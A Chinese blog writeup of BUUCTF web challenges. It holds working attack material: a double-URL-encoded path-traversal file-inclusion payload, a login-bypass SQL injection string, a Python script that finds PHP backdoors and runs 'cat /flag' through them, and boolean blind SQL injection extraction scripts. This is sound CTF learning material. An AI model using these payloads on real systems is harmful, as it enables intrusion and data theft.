BUUCTF在线靶场 部分WEB Writeup(updating)

最新推荐文章于 2024-06-12 19:50:44 发布
最新推荐文章于 2024-06-12 19:50:44 发布
阅读量667 收藏
点赞数
分类专栏: ctf 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38850916/article/details/120702160
版权

Warmup

提示source.php,访问/source.php查看内容

 提示source.php,访问/hint.php查看内容

需要对$page(可以用get方式或者post方式进行传入)进行拼接来绕过mb_strpos()函数,其中网页对传入的$page参数进行了urldecode(),%253经过两次url,触发网页底部的include()函数从而可以利用文件包含漏洞

//mb_strpos()函数是查询一个字符串在另一个字符串中出现的位置,返回值是首次出现位置的数值

payload

?file=hint.php%253f/../../../../../ffffllllaaaagggg

payload解析:
%253f从浏览器传入会被decode为%3f,%3f被urldecode()函数解析为?那么hint.php /../../../../../ ffffllllaaaagggg就被成功传入到后端了从而执行include(hint.php /../../../../../ ffffllllaaaagggg )

[极客大挑战 2019]EasySQL

随意提交一份发现是get方式请求

发现是字符型注入,而且是双引号闭合,尝试使用万能密码

构造payload

?username=1&password=1' or '1' = '

语句进入数据库后就会变成select * from table where username = '1' and password = '1' or '1'

高明的黑客

下载附件发现是一堆杂乱的php文件,并且还有好多不知道真假的一句话后门,后门参数也很复杂无法手动判断,利用脚本判断后门真假

import re
import os
import requests

files = os.listdir('src/')
reg = re.compile(r'\$_[GET]{3}\[\'(.+)\'\]')
for i in files:
    f = open('src/'+i)
    print('检查文件'+i)
    data = f.read()
    f.close()
    result = reg.findall(data)
    #print(i,result,"\n")
    url = 'http://2073ca8f-43a7-4086-b9b6-c03b0ddd39f3.node4.buuoj.cn:81/'
    for j in result:
        payload = url  + i + '?' + j + '=echo 123456'
        #print(payload)
        try:
            res = requests.get(url=payload,timeout=5)
        except:
            print(222222222)
        if '123456' in res.text:
            print(payload)
            payload1=url+i+'?'+j+'=cat /flag'
            res1 = requests.get(url=payload1)
            #print(payload1)
            reg1 = re.compile(r'flag\{.*?\}')
            result_flag = reg1.findall(res1.text)
            print(result_flag)

输出:

http://2073ca8f-43a7-4086-b9b6-c03b0ddd39f3.node4.buuoj.cn:81/xk0SzyKwfzw.php?Efa5BVG=echo 123456
['flag{c67a8c51-f28e-4fd9-bba1-8dffe98ce4a7}']

得到flag

[CISCN2019 华北赛区 Day2 Web1]Hack World

打开容器,发现是一个sql查询,使用burpsuit测试发现过滤了大量的关键字,没有屏蔽ascii,substr还有'='

输入1,和1=1 页面返回的内容都一样,考虑使用布尔盲注,手动太慢,用脚本(穷举ascii码1-127)

import re
import requests
result = ""
url='http://762429ff-8ef9-43ef-90c7-60240da0f142.node4.buuoj.cn:81/'
for i in range(1,50):
    print(i)
    for j in range(1,128):
        post_data = {'id':"1=(ascii(substr((select(flag)from(flag)),%s,1))=%s)"%(i,j)}
        try:
            res = requests.post(url=url,data=post_data,timeout=1)
            print(post_data)
            if 'Hello' in res.text:
                result+=chr(j)
                print(result)
                break
        except:
            print('404')

 成功跑出来了flag,但是很慢很慢,尝试使用二分法

import re
import requests
from requests.api import post
result = ""
url='http://762429ff-8ef9-43ef-90c7-60240da0f142.node4.buuoj.cn:81/'
for i in range(1,50):
    print(i)
    low = 1
    high = 127
    while(low<=high):
        mid = (low+high)//2
        post_data = {'id':"1=(ascii(substr((select(flag)from(flag)),%s,1))>%s)"%(i,mid)}
        post_data1 = {'id':"1=(ascii(substr((select(flag)from(flag)),%s,1))=%s)"%(i,mid)}
        #print(mid)
        #res1 = requests.post(url=url,data=post_data1,timeout=1)
        try:
            res = requests.post(url=url,data=post_data,timeout=1)
        except:
            print('res连接报错')
        if 'Hello' in res.text:
            low=mid +1
        else:
            try:
                res1 = requests.post(url=url,data=post_data1,timeout=1)
            except:
                print('res1连接报错')
            if 'Hello' in res1.text:
                result +=chr(mid)
                print(result)
                break
            else:
                high=mid-1

    输出结果一样

Le叶a子f
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
全!CTF靶场、渗透实战靶场总结 (适合收藏)
Appleteachers的博客
05-20 3万+
CTF靶场、渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门、提升自己、丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯); 渗透实战靶场:挖洞、渗透实战(web、域、横向渗透),适合实战能力需要大幅度提升的同学。 目录 ▶0x01 CTF赛事发布网站 ▶0x02 CTF在线靶场 ▶0x03 漏洞靶场(本地搭建) ▶0x04 渗透实战靶场 0x01 CTF赛事发布网站 i春秋和XCTF社区经常会发布各类CTF赛事 i春秋: https://www.
[2021东华杯]Web Writeup1
08-03
Java 反序列化漏洞及利用 Java 反序列化漏洞是 Java 语言中的一种常见漏洞,发生在 Java 对象的序列化和反序列化过程中。该漏洞可以导致攻击者执行恶意代码,盗取敏感信息,或者控制服务器。 ...
计算机网络安全技术:在线CTF靶场.pdf
05-12
在线CTF靶场介绍与体验 CTF (Capture The Flag)中文一般译作夺旗赛,在网络安 全领域中指的是网络安全技术人员之间进行技术竞技的一种比 赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之 前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成 为全球范围网络安全圈流行的竞赛形式,2013 年全球举办了超 过五十场国际性CTF 赛事。而DEFCON 作为CTF 赛制的发源地, DEFCON CTF 也成为了全球最高技术水平和影响力的CTF 竞赛, 类似于CTF赛场中的 “世界杯”。 在线CTF靶场介绍与体验 CTF : 在网络安全领域中指的是网络安全技术人员之间进行竞技 的一种比赛形式。 起源于1996年全球黑客大会,互相发起真实的攻击,最终 拿到对方的一些权限,然后把他们的一些标志提交到服务器上 的得分。 在线CTF靶场介绍与体验 CTF 比赛具体是分为几个解题的类别: 壹 软件的逆向破解等。 PWN ,PWNN 也是比较考验编程能力, 贰 在后期都是需要写一些脚本,去对一个漏 洞的利用,然后获得一个答案。 叁 webweb 方面是CTF一个主要的
CTF在线靶场聚集
最新发布
2302_78903258的博客
06-12 425
针对小伙伴们刚学CTF或者没学过CTF的,我列举了一些国内大学生常用的一些靶场,便于同学们练习,不同靶场难度可能不一样,大家都去练一练,选择适合自己的靶场即可。以下是一些CTF学习书籍和工具,如果没找到对自己有用的,大家可以在。此网站下搜索自己想要的工具。
BUUCTF靶场-web篇(一)
weixin_49349476的博客
03-24 422
BUUCTF靶场-web篇,EasySQL、include1、Havefun(WP)、Exec1
BUUCTF靶场练习——第一周
weixin_47063945的博客
07-15 1007
整理了buuctf靶场前6道web题目的writeup并整理了涉及到的部分知识的整理和扩展
BUU系列
qq_49422880的博客
07-16 307
[GYCTF2020]FlaskApp    开始打开这个靶场,发现这是一个加解密的应用,我们可以进行base64加解密,开始寻找网页的源代码,使用脚本扫描目录文件也没有什么发现,查看应用的网页源代码也没有发现。之前所解的一道题是一个基于flask框架的SSRF,然后就疯狂在输入框里面输入命令,看看有什么命令是执行的,试了几次之后发现有这样一个过程。我试了试{{3+7}}这种简单的注入测试发现加密的结果是10的base64加密,那这样子肯定是存在一个命令执行漏洞的(存在SSTI漏洞),之后的注入当中发现在
网络安全管理职业技能竞赛Web writeup1
08-03
网络安全管理职业技能竞赛Web writeup1 在本次网络安全管理职业技能竞赛Web writeup中,我们将探讨Web安全领域中的一个CTF挑战,涵盖了SQL注入、错误信息处理、Web应用安全等多个方面的知识点。 SQL注入 在本挑战...
web渗透writeup
09-11
总结,这个案例涵盖了Web安全中的关键知识点,包括SQL注入的防范、PHP函数的运用以及会话管理的安全性。对于开发者来说,了解这些攻击手段并采取相应的防护措施至关重要,如使用预编译的SQL语句、防止URL编码攻击...
vulhub靶场个人writeup,转载引用请注明地址,坑点补充联系作者。- -.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
XDCTF2014部分官方Writeup.doc
09-30
在访问特定的URL后,可以看到一个新的Python文件newapp.py的部分内容。关键在于,通过编写简单的爬虫或者使用Burp Suite工具,收集所有可能的文件内容。在这个过程中,找到了一个名为xdctf的函数,当特定条件满足时...
适合新手的CTF靶场合集
eli的博客
10-20 6833
CTF 比赛时间表 CTFwiki(入门必看wiki):https://ctf-wiki.github.io/ctf-wiki/#/introduction XCTF社区:https://time.xctf.org.cn i春秋:https://www.ichunqiu.com/competition CTFrank:https://ctfrank.org/ CTFtime(基本...
靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 1888
[RoarCTF 2019]Easy Java
BUUCTF靶场练习——第二周
weixin_47063945的博客
07-22 597
整理了buuctf靶场第七第八道web题目的做题笔记并整理了涉及到的部分知识和扩展
在线CTF靶场
wmr123456001的博客
02-12 546
在线CTF靶场
CTF靶场集合大放送(非常详细)零基础入门到精通,收藏这一篇就够了
logic1001的博客
04-01 1773
后续的主要关注点会在 vulfocus 和 RootTheBox 上。
BUUCTF靶场练习——第三周
weixin_47063945的博客
07-30 137
整理了buuctf靶场第九第十道web题目的做题笔记并整理了涉及到的部分知识和扩展
BUU靶场之REVERSE
qq_39763436的博客
04-02 543
BUU靶场之REVERSE REVERSE 今天开始学习CTF中的逆向 大致流程:判断程序是多少位以及是否加了壳,使用IDA进行反编译,在编写脚本 相关工具 【ExeinfoPe】 链接:https://pan.baidu.com/s/16SAvRVydckWYHF3wS93pGQ 提取码:gb3e 【Unpacker_ASPack】 链接:https://pan.baidu.com/s/1m73KxWa-HJgivuvOEb2JFg 提取码:wj33 【UPX Unpacker】 链接:https://p
buuctf lovesql
08-10
BUUCTF爱SQL(LoveSQL)是一个CTF竞赛中的SQL注入题目。根据引用和引用的描述,该题目涉及到了SQL注入漏洞,其中表名是l0ve1ysq1。为了解题,可以通过在URL中注入一些SQL语句来获取相关信息。其中,通过注入以下语句可以爆出表的列名: /check.php?username= 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #&password=1 [1 [3] 这样可以获取到l0ve1ysq1表的列名。进一步的解题过程包括读取表中的内容以及获得flag。具体的解题步骤和细节可以参考引用中的描述。123 #### 引用[.reference_title] - *1* *2* *3* [【BUUCTF】[极客大挑战 2019]LoveSQL 详细题解总结笔记 Writeup](https://blog.csdn.net/vanarrow/article/details/107991185)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值